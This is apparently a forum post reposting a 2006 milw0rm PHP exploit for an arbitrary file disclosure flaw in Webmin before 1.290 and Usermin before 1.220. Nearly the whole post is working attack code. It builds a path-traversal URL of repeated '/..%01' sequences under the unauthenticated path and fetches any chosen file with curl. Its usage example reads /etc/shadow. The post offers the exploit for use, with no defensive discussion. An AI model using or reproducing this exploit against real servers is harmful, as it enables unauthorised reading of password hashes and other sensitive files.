Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit

[Skayler]

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit

Para mais Informações, clique aqui.

Exploit:

Code Select Expand

<?php
/*
Name &#58; Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date &#58;  2006-06-30
Patch &#58; update to version 1&#46;290
Advisory &#58; http&#58;//securitydot&#46;net/vuln/exploits/vulnerabilities/articles/17885/vuln&#46;html
Coded by joffer , http&#58;//securitydot&#46;net
*/

$host = $argv[1&#93;;
$port = $argv[2&#93;;
$http = $argv[3&#93;;
$file = $argv[4&#93;;
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {


$z = "/&#46;&#46;%01";
for ($i=0;$i<60;$i++) {
        $z&#46;="/&#46;&#46;%01";
}

$target = $http&#46;"&#58;//"&#46;$host&#46;"&#58;"&#46;$port&#46;"/unauthenticated"&#46;$z&#46;"/"&#46;$file&#46;"";

echo "Attacking "&#46;$host&#46;"\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http&#58;//securitydot&#46;net\n";

} else {
        // IF INPUT IS NOT CORRECT DISPLAY THE README
        echo "Usage php webmin&#46;php HOST PORT HTTP/HTTPS FILE\n";
        echo "Example &#58; php webmin&#46;php localhost 10000 http /etc/shadow\n";
        echo "Coded by joffer , http&#58;//securitydot&#46;net\n";
}

?>

# milw0rm.com [2006-07-09]
Fonte: Milw0rm

[]'s


Skayler